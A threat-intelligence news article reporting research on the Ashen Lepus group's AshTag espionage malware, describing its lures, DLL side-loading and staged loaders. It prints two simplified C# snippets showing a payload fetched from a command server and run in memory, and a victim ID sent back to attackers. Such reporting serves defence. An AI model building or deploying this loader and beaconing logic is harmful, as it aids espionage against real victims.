Ashen Lepus Hacker Group Attacks Eastern Diplomatic Entities With New AshTag Malware

A Hamas‑affiliated threat group known as Ashen Lepus, also tracked as WIRTE, has launched a new espionage campaign against governmental and diplomatic entities across the Middle East.

The group uses realistic Arabic‑language diplomatic lures that reference regional politics and security talks to trick officials into opening weaponized documents.

Once a target interacts with the lure, a multi‑stage chain quietly delivers a new custom malware suite named AshTag, designed to steal sensitive diplomatic documents and maintain long‑term access to compromised systems.

The operation has continued through recent regional conflicts and even after the October 2025 Gaza ceasefire, underlining the group’s focus on persistent intelligence collection rather than short‑term disruption.

The attackers rely on benign‑looking PDFs that direct victims to download RAR archives containing a fake document executable, a malicious loader, and an extra decoy PDF.

When the victim runs what appears to be a document, Windows side‑loads a hidden malicious DLL and begins the infection, while a harmless PDF opens on screen to reduce suspicion.

Palo Alto Networks security researchers identified this new AshTag toolkit while tracking long‑running Ashen Lepus activity and noticed clear changes in both the malware and its command‑and‑control (C2) infrastructure.

Instead of using dedicated attacker‑owned domains, the group now hides behind API‑style subdomains of legitimate‑looking sites, such as api.healthylifefeed[.]com and auth.onlinefieldtech[.]com, to make their traffic blend in with normal web activity.

At the same time, payloads are executed in memory to leave fewer forensic traces on disk.

AshTag Infection Mechanism and Orchestrator Design

At the core of the campaign is a modular .NET backdoor, AshTag, which masquerades as a VisualServer utility but actually supports file exfiltration, command execution and in‑memory loading of extra tools.

The chain moves from an initial loader dubbed AshenLoader, to a secondary stager called AshenStager, and finally to an orchestration component, AshenOrchestrator, which controls all later modules.

AshenLoader sends basic host data to the C2 and fetches AshenStager from HTML content hidden between custom headerp tags.

AshenStager then requests another page and extracts a Base64‑encoded payload buried inside article tags.

A simplified version of this parsing logic can be expressed as:-

var html = GetHtml(c2Url);
var match = Regex.Match(html, "
]*>(?[^<]+)
");
var b64 = match.Groups["data"].Value;
var payload = Convert.FromBase64String(b64);
ExecuteInMemory(payload);

AshenOrchestrator receives a Base64‑encoded JSON configuration that includes C2 domains, module URLs, encryption keys and jitter values mn and mx to randomize beacon timing.

It first derives an AES key from tg and au parameters, then decrypts an XOR key used to decode the next embedded payload.

That payload is another Base64‑encoded JSON object that defines the module’s class name, such as SN for system fingerprinting or SCT for screen capture, and the loading method mna, which can direct the orchestrator to save a module to disk, execute it as a .NET assembly, upload extra content or inject code into memory.

One recovered module, SN, performs host profiling through simple WMI queries and sends a unique victim ID back to the attackers, helping Ashen Lepus focus on high‑value diplomatic systems.

A basic version of this logic can be illustrated as:-

var id = GetWmi("Win32_ComputerSystemProduct", "UUID");
PostToC2("/api/v2/register", id);

This careful layering of loaders, HTML‑hidden payloads, and modular .NET components shows that Ashen Lepus is steadily improving its tradecraft while keeping the code base simple, flexible and tuned for stealthy diplomatic espionage.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.